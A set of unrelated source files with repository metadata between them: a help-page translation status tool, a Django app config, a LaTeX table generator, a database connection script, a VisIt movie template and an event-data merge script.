deleted_pages.append(page)
os.remove(get_local_file_path(language=language, page=page))
return deleted_pages
def delete_all_generated_redirecting_pages(extended):
"""
deletes all the generated pages (inlcuding status.md)
:param extended: if True then the deleted pages will be printed
"""
for language in get_all_languages():
deleted_pages = []
include_page_path_to_main = get_include_page_path_to_main(language=language)
if os.path.isfile(include_page_path_to_main):
os.remove(include_page_path_to_main)
deleted_pages.append(include_page_path_to_main)
include_page_path_to_toc = get_include_page_path_to_toc(language=language)
if os.path.isfile(include_page_path_to_toc):
os.remove(include_page_path_to_toc)
deleted_pages.append(include_page_path_to_toc)
if language != MAIN_LANGUAGE:
deleted_pages = delete_redirecting_help_pages(language=language)
index = get_local_file_path(language=language, page="index.md")
if os.path.isfile(index):
os.remove(index)
deleted_pages.append("index.md")
num_deleted_pages = len(deleted_pages)
logger.ok("Deleted {num_deleted_pages} page(s) for language '{lang}'".format(lang=language, num_deleted_pages=num_deleted_pages))
if extended and num_deleted_pages != 0:
logger.neutral("\t{}".format(deleted_pages))
if os.path.isfile(FILE_STATUS):
os.remove(FILE_STATUS)
logger.ok("Delete the markdown status file")
def get_not_redirected_pages(main_language, secondary_language):
"""
:param main_language: string
:param secondary_language: string
:return: list of strings: the pages which are in the `main_language` but not in the `second_language`
"""
pages_main_language = get_help_pages_in(language=main_language)
pages_this_language = get_help_pages_in(language=secondary_language)
not_redirected_pages = []
for page in pages_main_language:
if page not in pages_this_language:
not_redirected_pages.append(page)
return not_redirected_pages
def get_translated_pages(language):
"""
:param language: string
:return: list of strings: the pages which are translated (excluded the redirected pages)
"""
translated_pages = []
for page in get_help_pages_in(language=language):
if not is_old_help_page_redirecting_to_new_one(language=language, page=page) and not is_redirect_page(language=language, page=page):
translated_pages.append(page)
return translated_pages
def get_old_help_pages_redirecting_to_new_one(language):
"""
:param language: string
:return: list of strings: the pages which redirect to the renamed page
"""
old_help_pages = []
for page in get_help_pages_in(language=language):
if is_old_help_page_redirecting_to_new_one(language=language, page=page):
old_help_pages.append(page)
return old_help_pages
def get_not_translated_pages(main_language, secondary_language):
"""
:param main_language: string
:param secondary_language: string
:return: list of strings: the pages which are redirected to the main language one
"""
pages_main_language = get_help_pages_in(secondary_language)
not_translated_pages = get_not_redirected_pages(main_language=main_language, secondary_language=secondary_language)
for page in pages_main_language:
if is_redirect_page(language=secondary_language, page=page):
not_translated_pages.append(page)
return not_translated_pages
def get_pages_not_in_main_language():
"""
:return: list of strings: the pages that are not in the main language
"""
main_not_translated_pages = {}
for language in get_other_languages():
not_translated_pages = get_not_translated_pages(main_language=language, secondary_language=MAIN_LANGUAGE)
if not_translated_pages:
main_not_translated_pages[language] = not_translated_pages
return main_not_translated_pages
def get_outdated_pages(language):
"""
:param language: string
:return: list of strings: pages which are outdated and need to be revised (checks the frontmatter)
"""
outdated_pages = []
for page in get_help_pages_in(language=language):
with open(get_local_file_path(language=language, page=page)) as yaml_page:
post = frontmatter.load(yaml_page)
if post[FRONTMATTER_OUTDATED] if FRONTMATTER_OUTDATED in post.keys() else False:
outdated_pages.append(page)
return outdated_pages
def check_language_status(language, extended):
"""
checks the status of this language and prints it on the console (maybe call `update` before?)
:param language: string
:param extended: boolean: if the specific pages should be printed
"""
outdated_pages = get_outdated_pages(language=language)
num_outdated_pages = len(outdated_pages)
if language == MAIN_LANGUAGE:
main_not_translated_pages = get_pages_not_in_main_language()
num_main_not_translated_pages = len(main_not_translated_pages)
log = logger.ok if num_main_not_translated_pages == 0 and num_outdated_pages == 0 else logger.error
log("Main Language: '{lang}'".format(lang=MAIN_LANGUAGE))
if num_main_not_translated_pages == 0:
logger.ok("\thas no conflicts")
else:
for key, value in main_not_translated_pages.iteritems():
logger.error("\tlanguage '{lang}' has {count} additional page(s)".format(lang=key, count=len(value)))
if extended and len(value) != 0:
logger.neutral("\t\t{pages}".format(pages=value))
else:
not_translated_pages = get_not_translated_pages(main_language=MAIN_LANGUAGE, secondary_language=language)
num_not_translated_pages = len(not_translated_pages)
not_redirected_pages = get_not_redirected_pages(main_language=MAIN_LANGUAGE, secondary_language=language)
num_not_redirected_pages = len(not_redirected_pages)
log = logger.ok if num_not_redirected_pages == 0 and num_not_translated_pages == 0 and num_outdated_pages == 0 else logger.error
log("Language: '{lang}'".format(lang=language))
log = logger.ok if num_not_translated_pages == 0 else logger.error
log("\thas {num_not_translated_pages} not translated page(s)".format(num_not_translated_pages=num_not_translated_pages))
if num_not_translated_pages != 0 and extended:
logger.neutral("\t\t{not_translated_pages}".format(not_translated_pages=not_translated_pages))
log = logger.ok if num_not_redirected_pages == 0 else logger.error
log("\thas {num_not_redirected_pages} not redirected page(s)".format(num_not_redirected_pages=num_not_redirected_pages))
if num_not_redirected_pages != 0 and extended:
logger.neutral("\t\t{not_redirected_pages}".format(not_redirected_pages=not_redirected_pages))
log = logger.ok if num_outdated_pages == 0 else logger.error
log("\thas {num_outdated_pages} outdated page(s)".format(num_outdated_pages=num_outdated_pages))
if num_outdated_pages != 0 and extended:
logger.neutral("\t\t{outdated_pages}".format(outdated_pages=outdated_pages))
def create_markdown(extended):
"""
creates a markdown file of the current status (maybe call `update` before?) and opens it (`status.md`)
:param extended: boolean: it the specific pages should be included in the status report
"""
main_not_translated_pages = get_pages_not_in_main_language()
num_languages_main_not_translated_pages = len(main_not_translated_pages)
num_main_not_translated_pages = 0
for lang in main_not_translated_pages:
num_main_not_translated_pages += len(lang)
markdown_text = []
markdown_text.append("---\ntitle: Translation Status\n---\n")
date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
markdown_text.append("# Help pages status\n")
markdown_text.append(u"{date} \u2013 `{hash}`\n\n".format(date=date,
branch=get_current_branch(), hash=get_current_hash_short()))
markdown_text.append("- Main language: `{main}`\n".format(main=MAIN_LANGUAGE))
markdown_text.append("- Available languages: {other}\n".format(
other=", ".join(["`{}`".format(num) for num in get_other_languages()])))
if num_main_not_translated_pages != 0:
markdown_text.append("- **The main language is missing {count_pages} additional page(s) in {count_language} languages**\n"
.format(count_pages=num_main_not_translated_pages, count_language=num_languages_main_not_translated_pages))
for key, value in main_not_translated_pages.iteritems():
markdown_text.append(" - language `{lang}` has {count} additional page(s)\n".format(lang=key, count=len(value)))
if extended and len(value) != 0:
for page in value:
link = get_file_link(language=key, page=page)
markdown_text.append(" - [{page}]({link})\n".format(page=page, link=link))
markdown_text.append("\n")
markdown_text.append("\n| Language | translated | not translated | outdated | % translated | % outdated |\n")
markdown_text.append( "| -------- | ---------- | -------------- | -------- | ------------ | ---------- |\n")
are_pages_outdated = False
are_pages_not_translated = False
for language in get_all_languages():
num_pages_translated = len(get_translated_pages(language=language))
num_pages_not_translated = len(get_not_translated_pages(main_language=MAIN_LANGUAGE, secondary_language=language))
num_pages_outdated = len(get_outdated_pages(language=language))
# num_pages_old = len(get_old_help_pages_redirecting_to_new_one(language=language))
percent_translated = int((1 - num_pages_not_translated / float(num_pages_not_translated + num_pages_translated)) * 100) \
if num_pages_not_translated + num_pages_translated != 0 else 100
percent_outdated = int((num_pages_outdated / float(num_pages_translated)) * 100) if num_pages_translated != 0 else 0
markdown_text.append("| {lang} | {translated} | {not_translated} | {outdated} | {percent_translated} | {percent_outdated} |\n"
.format(lang=language, translated=num_pages_translated, not_translated=num_pages_not_translated, outdated=num_pages_outdated,
percent_translated=percent_translated, percent_outdated=percent_outdated))
are_pages_outdated |= num_pages_outdated != 0
are_pages_not_translated |= num_pages_not_translated != 0
if extended:
if are_pages_outdated:
markdown_text.append("\n\n## Outdated page(s):\n")
for language in get_all_languages():
pages_outdated = get_outdated_pages(language=language)
if len(pages_outdated) != 0:
markdown_text.append("\n### `{language}`\n\n".format(language=language))
for page in pages_outdated:
link = get_file_link(language=language, page=page)
markdown_text.append("- [{page}]({link})\n".format(page=page, link=link))
if are_pages_not_translated:
markdown_text.append("\n\n## Not translated page(s):\n\n")
for language in get_other_languages():
not_translated_pages = get_not_translated_pages(main_language=MAIN_LANGUAGE, secondary_language=language)
if len(not_translated_pages) != 0:
markdown_text.append("\n### `{language}`\n\n".format(language=language))
for page in not_translated_pages:
link_en = get_file_link(language=MAIN_LANGUAGE, page=page)
link = get_file_link(language=language, page=page)
markdown_text.append("- [{page}]({link}) ([en]({link_en}))\n".format(page=page, link=link, link_en=link_en))
write_file(filename=FILE_STATUS, content=markdown_text)
def status(extended, markdown):
"""
checks the current status (maybe call `update` before?)
:param extended: boolean: if the specific pages should be included
:param markdown: boolean: if a markdown file should be created
"""
for language in get_all_languages():
check_language_status(language=language, extended=extended)
if markdown:
create_markdown(extended=extended)
def generate_missing_redirects(language):
"""
generates all the redirecting pages depending on the main page (including the old-to-new help pages)
:return: list of strings: the redirected pages
"""
if language == MAIN_LANGUAGE:
return []
redirected_pages = []
for page in get_not_redirected_pages(main_language=MAIN_LANGUAGE, secondary_language=language):
create_redirect_page(language=language, page=page)
redirected_pages.append(page)
return redirected_pages
def generate_inlcudes(language):
"""
generates the two layouts `back to main` and `back to toc`
:param language: string
"""
back_to_mainpage = u"<a href=\"..\">{}</a>\n".format(get_localization(language=language, key="Back to main page"))
write_file(filename=get_include_page_path_to_main(language=language), content=back_to_mainpage)
back_to_mainpage = u"<a href=\".\">{}</a>\n".format(get_localization(language=language, key="Back to table of contents"))
write_file(filename=get_include_page_path_to_toc(language=language), content=back_to_mainpage)
def update_index(extended):
"""
updates the index of all languages
:param extended: boolean: if the pages which could not be processed be printed
"""
def get_link_title_and_categories(language, page):
"""
:param language: string
:param page: string
:return: (string, string, string): file link, title, categories
"""
with open(get_local_file_path(language=MAIN_LANGUAGE, page=page)) as yaml_main_page:
with open(get_local_file_path(language=language, page=page)) as yaml_page:
main_post = frontmatter.load(yaml_main_page)
post = frontmatter.load(yaml_page)
file_link = get_relative_file_link(language=language, page=page)
title = post[FRONTMATTER_TITLE] if FRONTMATTER_TITLE in post.keys() else ""
if not title:
title = main_post[FRONTMATTER_TITLE] if FRONTMATTER_TITLE in main_post.keys() else ""
if language != MAIN_LANGUAGE and FRONTMATTER_CATEGORIES in post.keys():
logger.warn(u"categories are only needed to be declared in the {main} file, ignoring categories in following: '{lang}', '{file}'".format(main=MAIN_LANGUAGE, lang=language, file=page))
# getting the categories from the english file, prevents getting a translated category
categories = main_post[FRONTMATTER_CATEGORIES] if FRONTMATTER_CATEGORIES in main_post.keys() else []
for key in categories:
if not does_category_exist(key):
logger.error(u"Following category is not going to be considered '{lang}', '{file}', '{key}'".format(lang=language, file=page, key=key))
return file_link, title, categories
def create_index_file(order, index_file, index, indentation=2):
"""
creates the index file out of the category order and the presorted pages
:param order: list of strings: the order of the categories
:param index_file: list of strings
:param index: dict of strings and dicts: the presorted pages
:param indentation: int: how much the category is indented
"""
# 2 loops to write the link before subsections
for key, value in sorted(index.items(), key=lambda x:x[1]):
if type(value) is not dict:
index_file.append(u"- [{title}]({link})\n".format(title=value, link=key))
last_category = ""
for category in order:
if type(category) is list:
create_index_file(order=category, index_file=index_file, index=index[last_category], indentation=indentation + 1)
else:
last_category = category
if category not in index.keys():
logger.error(u"\tFollowing category is non-existent: {category}".format(category=category))
continue
translated_category = get_localization(language=language, key=category)
index_file.append(u"\n{indentation} {title}\n".format(indentation="#" * indentation, title=translated_category))
create_index_file(order=[], index_file=index_file, index=index[category], indentation=indentation + 1)
considered = True
index_file.append("\n")
for language in get_all_languages():
renamed_pages = remove_help_suffix(language=language)
redirected_pages = generate_missing_redirects(language=language)
generate_inlcudes(language=language)
missing_frontmatter = []
num_pages_on_index = 0
index = {}
for page in get_help_pages_in(language=language):
if is_old_help_page_redirecting_to_new_one(language=language, page=page):
continue
file_link, title, categories = get_link_title_and_categories(language=language, page=page)
if not title or not categories:
missing_frontmatter.append(file_link)
continue
index_tmp = index
for category in categories:
if category not in index_tmp:
new_dict = {}
index_tmp[category] = new_dict
index_tmp = new_dict
else:
index_tmp = index_tmp[category]
index_tmp[file_link] = title
num_pages_on_index += 1
title = get_localization(language=language, key="Help contents")
more_questions = get_localization(language=language, key="You can't find a solution to your problem? You still have questions?")
forum_hint = get_localization(language=language, key="Use the online forum to get more support!")
index_file = [get_index_header(title=title, more_questions=more_questions, forum=forum_hint)]
create_index_file(order=get_categories_order(), index_file=index_file, index=index)
write_file(language + "/index.md", index_file)
num_missing_frontmatter = len(missing_frontmatter)
num_redirected_pages = len(redirected_pages)
num_renamed_pages = len(renamed_pages)
logger.ok("Language: '{language}'".format(language=language))
logger.ok("\tgenerated the 'include' pages")
logger.ok("\tremoved the 'Help' suffix from {} pages".format(num_renamed_pages))
if extended and num_renamed_pages != 0:
logger.neutral("\t\t{}".format(renamed_pages))
if language != MAIN_LANGUAGE:
logger.ok("\tredirected {} page(s)".format(num_redirected_pages))
if num_redirected_pages != 0 and extended:
logger.neutral("\t\t{}".format(redirected_pages))
if num_missing_frontmatter != 0:
logger.error("\t{} page(s) with missing frontmatter".format(num_missing_frontmatter))
if extended:
logger.neutral("\t\t{}".format(missing_frontmatter))
logger.ok("\tcreated index with {} page(s)".format(num_pages_on_index))
def remove_help_suffix(language):
"""
removes the help suffix from all pages and adds redirects in english, run `update` afterwards
:param language: string
:return: list of (string, string): (old page, new page)
"""
renamed_files = []
for page in get_help_pages_in(language=language):
if page.endswith("Help.md") and not is_old_help_page_redirecting_to_new_one(language=language, page=page):
new_page = page.replace("Help.md", ".md")
old_path = get_local_file_path(language=language, page=page)
new_path = get_local_file_path(language=language, page=new_page)
os.rename(old_path, new_path)
renamed_files.append((page, new_page))
if language == MAIN_LANGUAGE:
redirect = get_redirect_page_content(language=language, page=new_page)
write_file(filename=old_path, content=redirect)
return renamed_files
def remove_all_help_suffixes(extended):
for language in get_all_languages():
renamed_pages = remove_help_suffix(language=language)
num_renamed_pages = len(renamed_pages)
logger.ok("Language: '{language}'".format(language=language))
logger.ok("\tremoved the 'Help' suffix from {} pages".format(num_renamed_pages))
if extended and num_renamed_pages != 0:
logger.neutral("\t\t{}".format(renamed_pages))
parser = argparse.ArgumentParser()
subparser = parser.add_subparsers(help='commands', dest='command')
parser_status = subparser.add_parser(COMMAND_STATUS, help="Lists the current status of the help pages.")
parser_status.add_argument("-e", "--extended", action="store_true", dest="extended", default=False,
help="The output is much more sophisticated")
parser_status.add_argument("-m", "--markdown", action="store_true", dest="markdown", default=False,
help="converts the output to markdown")
parser_update = subparser.add_parser(COMMAND_UPDATE, help="Generates all the missing redirection pages and updates the index files")
parser_update.add_argument("-e", "--extended", action="store_true", dest="extended", default=False,
help="The output is much more sophisticated")
parser_clean = subparser.add_parser(COMMAND_CLEAN,
help="Removes all the generated redirect files (CAUTION: index page may not work anymore)")
parser_clean.add_argument("-e", "--extended", action="store_true", dest="extended", default=False,
help="The output is much more sophisticated")
parser_suffix = subparser.add_parser(COMMAND_REMOVE_SUFFIX,
help="Removes the 'Help' suffix from all pages and create redirects")
parser_suffix.add_argument("-e", "--extended", action="store_true", dest="extended", default=False,
help="The output is much more sophisticated")
args = parser.parse_args()
if args.command == COMMAND_STATUS:
status(extended=args.extended, markdown=args.markdown)
elif args.command == COMMAND_UPDATE:
delete_all_generated_redirecting_pages(extended=args.extended)
update_index(extended=args.extended)
create_markdown(extended=True)
elif args.command == COMMAND_CLEAN:
delete_all_generated_redirecting_pages(extended=args.extended)
elif args.command == COMMAND_REMOVE_SUFFIX:
remove_all_help_suffixes(extended=args.extended)
| 41.916777 | 203 | 0.68838 |
5acf44f33419d3b8101e2d5a04696c52b121d755
| 99 |
py
|
Python
|
src/kandidaturen/apps.py
|
Sumarbrander/Stura-Mitgliederdatenbank
|
691dbd33683b2c2d408efe7a3eb28e083ebcd62a
|
[
"MIT"
] | 1 |
2021-12-20T20:15:26.000Z
|
2021-12-20T20:15:26.000Z
|
src/kandidaturen/apps.py
|
Sumarbrander/Stura-Mitgliederdatenbank
|
691dbd33683b2c2d408efe7a3eb28e083ebcd62a
|
[
"MIT"
] | null | null | null |
src/kandidaturen/apps.py
|
Sumarbrander/Stura-Mitgliederdatenbank
|
691dbd33683b2c2d408efe7a3eb28e083ebcd62a
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class KandidaturenConfig(AppConfig):
name = 'kandidaturen'
| 16.5 | 36 | 0.777778 |
5ae487f8ac356238b78460ec7d02d0db0dff40e3
| 1,170 |
py
|
Python
|
LaTeX/table/table_tex.py
|
tlming16/Projec_Euler
|
797824c5159fae67493de9eba24c22cc7512d95d
|
[
"MIT"
] | 4 |
2018-11-14T12:03:05.000Z
|
2019-09-03T14:33:28.000Z
|
LaTeX/table/table_tex.py
|
tlming16/Projec_Euler
|
797824c5159fae67493de9eba24c22cc7512d95d
|
[
"MIT"
] | null | null | null |
LaTeX/table/table_tex.py
|
tlming16/Projec_Euler
|
797824c5159fae67493de9eba24c22cc7512d95d
|
[
"MIT"
] | 1 |
2018-11-17T14:39:22.000Z
|
2018-11-17T14:39:22.000Z
|
#!/usr/bin/env python3
# coding:utf-8
# author [email protected]
# simple scripts to transfrom text to LaTeX table
import sys
def generate_tex_table(file_in,file_out):
file=file_in
tex=file_out
with open(file) as ftext:
context =ftext.readlines()
f=open(tex,'w');
f.write("\\documentclass{article}\n")
f.write("\\usepackage{ctex}\n")
f.write("\\usepackage{amsmath}\n")
f.write("\\begin{document}\n")
f.write("\\begin{table}\n")
f.write("\\begin{tabular}{")
n= len(context[0].split(' '))
for i in range(n):
f.write("|c")
f.write("|")
f.write("}\n")
for text in context:
text = text.split()
f.write("\\hline\n")
for v in range(len(text)):
f.write(text[v])
if v !=len(text)-1:
f.write('&')
f.write("\\\\\n")
f.write("\\hline\n")
f.write("\\end{tabular}\n")
f.write("\\end{table}\n")
f.write("\\end{document}\n")
if __name__ =="__main__":
if len(sys.argv)>2:
file_in = sys.argv[1]
file_out =sys.argv[2]
else:
file_in ='text.txt'
file_out ='generate_tex_table.tex'
generate_tex_table(file_in,file_out)
| 24.893617 | 50 | 0.579487 |
7a245ac8aaf32194b05d940e0f7e9b96f686b93b
| 677 |
py
|
Python
|
aggregator_auth/connect.py
|
semen603089/aggregator-backend
|
04294e0e466c0ecfd322ec1839d3e6e6bb4d2155
|
[
"BSD-3-Clause"
] | null | null | null |
aggregator_auth/connect.py
|
semen603089/aggregator-backend
|
04294e0e466c0ecfd322ec1839d3e6e6bb4d2155
|
[
"BSD-3-Clause"
] | null | null | null |
aggregator_auth/connect.py
|
semen603089/aggregator-backend
|
04294e0e466c0ecfd322ec1839d3e6e6bb4d2155
|
[
"BSD-3-Clause"
] | null | null | null |
import keyring
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy import create_engine, MetaData, Table
DB_USER = 'grigorevsi'
system = 'app'
DB_HOST = 'db.profcomff.com'
DB_NAME = 'dev'
DB_PORT = '25432'
def get_pass(system: str, username: str):
return keyring.get_password(system, username)
DB_PASS = get_pass("app", "grigorevsi")
engine = create_engine(f"postgresql+psycopg2://{DB_USER}:{DB_PASS}@{DB_HOST}:{DB_PORT}/{DB_NAME}", echo=True)
meta = MetaData(engine)
timetable = Table('timetable', meta, autoload=True)
try:
conn = engine.connect()
print('Connection successful')
except SQLAlchemyError as e:
print(f"The error '{e}' occurred")
| 22.566667 | 109 | 0.72969 |
7a2d9ff5776017cdd2e746e79e8ce39561b9cb41
| 11,105 |
py
|
Python
|
src/resources/movietemplates/curveoverlay_ref.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 226 |
2018-12-29T01:13:49.000Z
|
2022-03-30T19:16:31.000Z
|
src/resources/movietemplates/curveoverlay_ref.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 5,100 |
2019-01-14T18:19:25.000Z
|
2022-03-31T23:08:36.000Z
|
src/resources/movietemplates/curveoverlay_ref.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 84 |
2019-01-24T17:41:50.000Z
|
2022-03-10T10:01:46.000Z
|
###############################################################################
# Function: Sequence1Frames_set_timeslider
#
# Purpose:
# This is a callback function for sequence 1's IterateCallbackAndSaveFrames
# function. This function sets the time and updates the time slider so
# it has the right time value.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
#
###############################################################################
def Sequence1Frames_set_timeslider(i, cbdata):
ts = cbdata
ret = SetTimeSliderState(i)
Query("Time")
time = GetQueryOutputValue()
ts.text = "Time = %1.5f" % time
return ret
###############################################################################
# Function: Sequence1Frames_set_timeslider
#
# Purpose:
# This is a callback function for sequence 2's IterateCallbackAndSaveFrames
# function. This function lets us adjust the clip plane as a function of
# the number of time states and save out an image each time.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
# Brad Whitlock, Thu Nov 11 15:33:13 PST 2010
# We now have to DrawPlots after setting operator options.
#
###############################################################################
def Sequence2Frames_clip_cb(i, cbdata):
nts = cbdata[0]
clip = cbdata[1]
xmin = cbdata[2]
xmax = cbdata[3]
vc = cbdata[4]
t = float(i) / float(nts-1)
newX = t * (xmax - xmin) + xmin
clip.plane1Origin = (newX, 0, 0)
ret = SetOperatorOptions(clip)
DrawPlots()
SetViewCurve(vc)
return ret
###############################################################################
# Class: OverlayCurveOnReflectedPlotsMovieTemplate
#
# Purpose:
# This is movie template class creates a movie of a FilledBoundary plot
# and a Curve plot that animates over time.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
#
###############################################################################
class OverlayCurveOnReflectedPlotsMovieTemplate(VisItMovieTemplate):
def __init__(self, mm, tr):
super(OverlayCurveOnReflectedPlotsMovieTemplate, self).__init__(mm, tr)
self.timeSlider = ""
###########################################################################
# Function: Sequence1Frames
#
# Purpose:
# This method creates the frames for sequence 1.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
# Brad Whitlock, Thu Nov 11 15:44:20 PST 2010
# I fixed some deprectated annotations and made reflect work again.
#
###########################################################################
def Sequence1Frames(self, formats, percents):
self.Debug(1, "OverlayCurveOnReflectedPlotsMovieTemplate.Sequence1Frames: begin")
options = self.sequence_data["SEQUENCE_1"]
# Set up the plots.
DeleteAllPlots()
OpenDatabase(options["DATABASE1"])
if options["PLOT_TYPE1"] == 0:
if AddPlot("FilledBoundary", options["PLOT_VAR1"]) == 0:
raise self.error("The FilledBoundary plot could not be created for "
"sequence 1.")
elif options["PLOT_TYPE1"] == 1:
if AddPlot("Boundary", options["PLOT_VAR1"]) == 0:
raise self.error("The Boundary plot could not be created for "
"sequence 1.")
else:
if AddPlot("Pseudocolor", options["PLOT_VAR1"]) == 0:
raise self.error("The Pseudocolor plot could not be created for "
"sequence 1.")
# Create plot 2
OpenDatabase(options["DATABASE2"])
if options["PLOT_TYPE2"] == 0:
if AddPlot("FilledBoundary", options["PLOT_VAR2"]) == 0:
raise self.error("The FilledBoundary plot could not be created for "
"sequence 1.")
elif options["PLOT_TYPE2"] == 1:
if AddPlot("Boundary", options["PLOT_VAR2"]) == 0:
raise self.error("The Boundary plot could not be created for "
"sequence 1.")
else:
if AddPlot("Pseudocolor", options["PLOT_VAR2"]) == 0:
raise self.error("The Pseudocolor plot could not be created for "
"sequence 1.")
SetActivePlots(1)
AddOperator("Reflect")
refl = ReflectAttributes()
refl.reflections = (0,0,1,0,0,0,0,0)
SetOperatorOptions(refl)
DrawPlots()
ResetView()
# If the databases are not the same then create a database correlation
# so we can get a new time slider to use. In any case, keep track
# of the time slider that we'll be using.
self.timeSlider = options["DATABASE1"]
if options["DATABASE1"] != options["DATABASE2"]:
dbs = (options["DATABASE1"], options["DATABASE2"])
if CreateDatabaseCorrelation("DB1DB2", dbs, 1) == 1:
self.timeSlider = "DB1DB2"
SetActiveTimeSlider(self.timeSlider)
# Set the background color.
annot = GetAnnotationAttributes()
annot.foregroundColor = (255, 255, 255, 255)
annot.gradientColor1 = options["GRADIENT_BGCOLOR1"]
annot.gradientColor2 = options["GRADIENT_BGCOLOR2"]
annot.gradientBackgroundStyle = annot.TopToBottom
annot.backgroundMode = annot.Gradient
# Turn off certain annotations.
annot.userInfoFlag = 0
annot.databaseInfoFlag = 0
annot.legendInfoFlag = 0
# Set the axis names
annot.axes2D.xAxis.title.title = options["XAXIS_TEXT"]
annot.axes2D.yAxis.title.title = options["YAXIS_TEXT"]
annot.axes2D.xAxis.title.userTitle = 1
annot.axes2D.yAxis.title.userTitle = 1
SetAnnotationAttributes(annot)
# Change the viewport
v = GetView2D()
v.viewportCoords = (0.1, 0.95, 0.35, 0.95)
SetView2D(v)
ts = CreateAnnotationObject("TimeSlider")
classification = CreateAnnotationObject("Text2D")
classification.text = options["CLASSIFICATION_TEXT"]
classification.useForegroundForTextColor = 0
classification.textColor = options["CLASSIFICATION_TEXTCOLOR"]
classification.position = (0.80, 0.97)
classification.height = 0.02
classification.fontBold = 1
title = CreateAnnotationObject("Text2D")
title.text = options["TITLE"]
title.position = (0.01, 0.955)
title.height = 0.03
title.fontBold = 1
# Save the frames.
cb_data = (TimeSliderGetNStates(), Sequence1Frames_set_timeslider, ts)
ret = self.IterateCallbackAndSaveFrames(cb_data, "seq1", formats, percents, "Generating sequence 1 frames")
DeleteAllPlots()
ts.Delete()
classification.Delete()
title.Delete()
self.Debug(1, "OverlayCurveOnReflectedPlotsMovieTemplate.Sequence1Frames: end")
return (ret, "seq1", GetAnnotationAttributes().backgroundColor)
###########################################################################
# Function: Sequence2Frames
#
# Purpose:
# This method creates the frames for sequence 2.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
#
###########################################################################
def Sequence2Frames(self, formats, percents):
self.Debug(1, "OverlayCurveOnReflectedPlotsMovieTemplate.Sequence2Frames: begin")
options = self.sequence_data["SEQUENCE_2"]
# Determine the number of time steps in the first sequence's time
# slider so we can know how to advance the Clip operator.
dbc = GetDatabaseCorrelation(self.timeSlider)
nts = dbc.numStates
DeleteAllPlots()
self.DeleteAllAnnotationObjects()
# Set up the Curve plot.
OpenDatabase(options["CURVE_DATABASE"])
AddPlot("Curve", options["CURVE_VARIABLE"])
DrawPlots()
cAtts = CurveAttributes(1)
cAtts.showLabels = 0
SetPlotOptions(cAtts)
ResetView()
vc = GetViewCurve()
vc.viewportCoords = (0.1, 0.95, 0.15, 1.)
# Get the Curve plot extents
Query("SpatialExtents")
extents = GetQueryOutputValue()
AddOperator("Clip")
clip = ClipAttributes()
clip.funcType = clip.Plane
clip.plane1Status = 1
clip.plane2Status = 0
clip.plane3Status = 0
clip.plane1Origin = (extents[0], 0, 0)
clip.plane1Normal = (1, 0, 0)
clip.planeInverse = 0
SetOperatorOptions(clip)
DrawPlots()
# Set the background color.
annot = GetAnnotationAttributes()
annot.backgroundMode = annot.Solid
annot.foregroundColor = (255, 255, 255, 255)
annot.backgroundColor = (0, 0, 0, 255)
# Turn off most annotations.
annot.userInfoFlag = 0
annot.databaseInfoFlag = 0
annot.legendInfoFlag = 0
annot.axes2D.xAxis.title.visible = 0
annot.axes2D.yAxis.title.visible = 0
annot.axes2D.xAxis.label.visible = 0
annot.axes2D.yAxis.label.visible = 0
SetAnnotationAttributes(annot)
title = CreateAnnotationObject("Text2D")
title.text = options["CURVE_TITLE"]
title.position = (0.11, 0.88)
title.height = 0.1
title.fontBold = 1
# Save the frames. This will be done by some other thing so the
# will have the viewport names worked in.
cb_data = (nts, Sequence2Frames_clip_cb, (nts, clip, extents[0], extents[1], vc))
ret = self.IterateCallbackAndSaveFrames(cb_data, "seq2", formats, percents, "Generating sequence 2 frames")
title.Delete()
DeleteAllPlots()
self.Debug(1, "OverlayCurveOnReflectedPlotsMovieTemplate.Sequence2Frames: end")
return (ret, "seq2", GetAnnotationAttributes().backgroundColor)
###########################################################################
# Function: HandleScriptingSequence
#
# Purpose:
# This method invokes the appropriate routine for creating sequence
# frames.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
#
###########################################################################
def HandleScriptingSequence(self, seqName, formats, percents):
ret = 0
if seqName == "SEQUENCE_1":
ret = self.Sequence1Frames(formats, percents)
elif seqName == "SEQUENCE_2":
ret = self.Sequence2Frames(formats, percents)
return ret
# Public
def InstantiateMovieTemplate(moviemaker, templateReader):
return OverlayCurveOnReflectedPlotsMovieTemplate(moviemaker, templateReader)
| 37.265101 | 115 | 0.577848 |
64f37b5a2c000d16e73bc4962fbae1dfba9ea790
| 1,323 |
py
|
Python
|
data/scripts/merge.py
|
salaniz/berlin-events
|
5ad6c3b37d39194293223996a520d3a252f8a199
|
[
"BSD-3-Clause"
] | null | null | null |
data/scripts/merge.py
|
salaniz/berlin-events
|
5ad6c3b37d39194293223996a520d3a252f8a199
|
[
"BSD-3-Clause"
] | null | null | null |
data/scripts/merge.py
|
salaniz/berlin-events
|
5ad6c3b37d39194293223996a520d3a252f8a199
|
[
"BSD-3-Clause"
] | null | null | null |
import json, csv
with open('../events_location.json', 'r') as f:
json_data = json.load(f)
csv_data = []
with open('../events_data.csv', 'r') as f:
csv_reader = csv.DictReader(f)
for row in csv_reader:
csv_data.append(row)
print csv_data[0].keys()
print json_data[0].keys()
merged_data = []
i = 0
print len(json_data)
print len(csv_data)
del csv_data[0]
print len(csv_data)
for csv_e, json_e in zip(csv_data, json_data):
merged_dict = {}
merged_dict['id'] = csv_e['id']
merged_dict['county'] = csv_e['bezirk']
merged_dict['name'] = csv_e['bezeichnung']
merged_dict['location'] = csv_e['strasse']
merged_dict['from'] = csv_e['von']
merged_dict['to'] = csv_e['bis']
merged_dict['time'] = csv_e['zeit']
